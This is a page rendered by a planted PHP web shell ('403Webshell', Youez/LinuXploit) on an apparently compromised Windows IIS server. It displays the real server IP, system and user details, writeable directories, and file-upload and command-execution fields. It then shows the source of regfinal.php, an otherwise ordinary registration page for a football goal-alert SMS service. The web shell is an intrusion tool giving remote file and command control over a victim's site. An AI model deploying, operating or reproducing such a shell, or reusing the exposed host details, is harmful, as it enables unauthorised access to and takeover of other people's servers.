403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /HostingSpaces/admin/sms4real.com/wwwroot/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /HostingSpaces/admin/sms4real.com/wwwroot//regfinal.php
<?php
include "general.php";
?>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="goal, goals, alert, alerts, goals alert,goals api,alert api,football, football update, live feeds" />
<meta name="description" content="alert,goals,live update,goals update, football, goals api ,goal api, live feeds" />

<title>GoalsAlert.com - Be First To Know The Scores</title>
<!-- SET: FAVICON -->
<link rel="shortcut icon" type="image/x-icon" href="images/favicon.ico" />
<!-- END: FAVICON -->
<!-- SET: STYLESHEET -->


<link rel="stylesheet" href="css/nivo-slider.css" type="text/css" media="screen" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="js/jquery.nivo.slider.js" type="text/javascript"></script>


<script type="text/javascript">
$(document).ready(function(){ 

    var auto= $('#tweets'), refreshed_content;	
		refreshed_content = setInterval(function(){
		auto.fadeOut("slow").load("livegoals.php").fadeIn("slow");}, 
		5000); 										
		console.log(refreshed_content);										 
		return false; 
});
</script>

<script type="text/javascript">
$(window).load(function() {
	$('#slider').nivoSlider({
		effect:'random',
		slices:15,
		animSpeed:500,
		pauseTime:5000,
		startSlide:0, //Set starting Slide (0 index)
		directionNav:false, 
		directionNavHide:false, //Only show on hover
		controlNav:false, //1,2,3...
		controlNavThumbs:false, //Use thumbnails for Control Nav
		pauseOnHover:true, //Stop animation while hovering
		manualAdvance:false, //Force manual transitions
		captionOpacity:0.8, //Universal caption opacity
		beforeChange: function(){},
		afterChange: function(){},
		slideshowEnd: function(){} //Triggers after all slides have been shown
	});
});
</script>

<link href="css/style.css" rel="stylesheet" type="text/css" media="all" />
<!-- END: STYLESHEET -->

</head>
<body>
<!-- wrapper starts -->
<div class="wrapper"> 
  <!-- main Starts -->
  <div class="main"> 
    <!-- Header Starts -->
    <div class="header">
      <div class="logo flt_lt">
        <h1><a href="#">Goalsalert.com</a></h1>
        <p>Be First To Know The Scores...</p>
      </div>
      <div class="header_right flt_rt">
        <ul>
          <li><a href="#"><img src="images/twitter-logo.png" width="16" height="16" alt="twitter" class="img" /><span>twitter</span></a></li>
          <li><a href="#"><img src="images/fb-logo.png" width="16" height="16" alt="facebook" class="img"  /><span>facebook</span></a></li>
        </ul>
        <div class="clear"></div>
      </div>
      <div class="clear"></div>
	 
      <div id="nav">
        <ul>
          <li><a href="index.php">Home</a></li>
          <li><a href="register.php">Register</a></li>
		  <li><a href="login.php">Login</a></li>
		  <li><a href="payment.php">Payment</a></li>
          <li><a href="api.php">Goal Alert API</a></li>
          <li><a href="contact.php">Contact Us</a></li>
        </ul>
        <div class="clear"></div>
      </div>
      <div class="clear"></div>
    </div>
    <div class="clear"></div>
    <!-- Header ends --> 
    <!-- content Starts -->
    <div class="content">
      <div class="banner">
        <div id="homepage_slider">
          <div id="slider"> <a href="#"><img src="images/slideshow/01.png" alt="Slide 01" title="Welcome to Goal Alert Service" /></a> <a href="#"><img src="images/slideshow/02.png" alt="Slide 02" title="We push near realtime goal alerts of three major leagues in the world to mobile phones" /></a> <a href="#"><img src="images/slideshow/03.png" alt="Slide 03" title="We cover other 168 mobile operators in the world" /></a> <a href="#"><img src="images/slideshow/04.png" alt="Slide 04" title="Register today and start receiving Premisership, La Liga, & UEFA scores on your mobile phones" /></a> <a href="#"><img src="images/slideshow/05.png" alt="Slide 05" title="Service works on all phones - Be First To Know The Scores " /></a> <a href="#"><img src="images/slideshow/06.png" alt="Slide 06" title="Service works on all phones - Be First To Know The Scores " /></a><a href="#"><img src="images/slideshow/07.png" alt="Slide 07" title="Service works on all phones - Be First To Know The Scores " /></a></div>
        </div>
      </div>
	  
	  
	  
 <div class="clear"></div>
   
      <div class="content1">
        <div class="content1_box3 flt_lt">
         <?php 

if ($_SESSION['regfinal'] == "" ){
 
  header('Location: register.php?err=14');
   die();
 }
 
 if ($_SESSION['emailcode'] == "" ){
 
  header('Location: register.php?err=14');
   die();
 }
 
 if ($_SESSION['smscode'] == "" ){
 
  header('Location: register.php?err=14');
   die();
 }
 
 
?>

  <?php 
					 $errno = isset($_GET['err']) ? $_GET['err'] : '';
	                  if($errno ==='1')
	                     {
	                       echo "<p><span class='redwords'>Database Error, please try again or contact your account manager</span></p>";
	                     }
					   
					    if($errno ==='2')
	                     {
	                       echo "<p><span class='redwords'>Select Account Type...</p>";
	                     }
						 
						  if($errno ==='3')
	                     {
	                       echo "<p><span class='redwords'>Emmailcide does not match</span></p>";
	                     }
						 
						   if($errno ==='4')
	                     {
	                       echo "<p><span class='redwords'>SMScode/Emailcode cannot be blank</span></p>";
	                     }
						    if($errno ==='5')
	                     {
	                       echo "<p><span class='redwords'>Invalid Email</span></p>";
	                     }
					    
						   if($errno ==='6')
	                     {
	                       echo "<p><span class='redwords'>Phonenumber must be 7+ digits long</span></p>";
	                     }
						 
						    if($errno ==='7')
	                     {
	                       echo "<p><span class='redwords'>Address must be 10+ characters long</span></p>";
	                     }
						 
						    if($errno ==='8')
	                     {
	                       echo "<p><span class='redwords'>Nigerian Phonenumbers must be 13 digits long</span></p>";
	                     }
						 
						  if($errno ==='9')
	                     {
	                       echo "<p><span class='redwords'>Nigerian Phonenumbers must start with 234</span></p>";
	                     }
						 
						  if($errno ==='10')
	                     {
	                       echo "<p><span class='redwords'>Username has been taken. Please select another username</span></p>";
	                     }
						 
						  if($errno ==='11')
	                     {
	                       echo "<p><span class='redwords'>Email already exists. Please use another email</span></p>";
	                     }
						 
						   if($errno ==='12')
	                     {
	                       echo "<p><span class='redwords'>Phonenumber  already used. Please use another phonenumber</span></p>";
	                     }
						 
						  if($errno ==='13')
	                     {
	                       echo "<p><span class='redwords'>Sorry we could not send you an SMS this time. Please try later.</span></p>";
	                     }
						 
						  if($errno ==='14')
	                     {
	                       echo "<p><span class='redwords'>Please complete the form below to continue</span></p>";
	                     }
						 
						 
			 ?>
      
	   <h3>Payment Option (Final Registration Step) </h3>
	   <p>Paid Account does not pay now. Payment can be made later so that you get all live matches. Free Account can upgrade to Paid Account any time. </p>
	   <form action="regsubfinal.php" method="post">
	 <table border="0"  class="basic-grey" align="left" width="90%">
	 <tr>
	 
        <td style="height:50px">&nbsp;&nbsp;</td>
        <td style="height:50px">&nbsp;&nbsp;</td>
    </tr>
    <tr>
	 
        <td><h6>Full Live Goal Alerts</h6></td>
        <td><input id="name" type="radio" name="accounttype" value="paid" >Paid Account</td>
    </tr>
    <tr>
	 
        <td> <h6>Limited Live Goal Alerts</h6></td>
        <td><input id="name" type="radio" name="accounttype" value="free" >Free Account </td>
    </tr>
      <tr>
                    <td colspan="2"  align="center"><input type="submit" class="button" name="submit" id="submit" value="Send" /></td>
                  </tr>
				  <tr>
	 
        <td style="height:50px">&nbsp;&nbsp;</td>
        <td style="height:50px">&nbsp;&nbsp;</td>
    </tr>
</table>	  
</form>
        </div>
        
		<div class="content1_box4 flt_lt">
		 
		</div>
        <div class="clear"></div>
      


    </div>
    <div class="clear"></div>
    <!-- content ends -->
    <div class="footer">
      <p>Copyright © 2015 Swift Alliance Ltd. All rights reserved. </p>
    </div>
  </div>
  <!-- main ends --> 
</div>
<!-- wrapper ends -->
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit